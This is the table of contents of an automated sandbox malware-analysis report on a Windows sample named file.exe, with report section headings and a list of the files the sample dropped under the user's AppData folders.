
Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\djqdPdQRO.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ayj2cqqi.dpv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jjjhpz4h.4wh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tz3ytraj.52s.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w3nyenre.ers.psm1

C:\Users\user\AppData\Local\Temp\tmp8017.tmp

C:\Users\user\AppData\Local\Temp\tmp93EE.tmp

C:\Users\user\AppData\Roaming\djqdPdQRO.exe

C:\Users\user\AppData\Roaming\djqdPdQRO.exe:Zone.Identifier

Static File Info

Windows Analysis Report
file.exe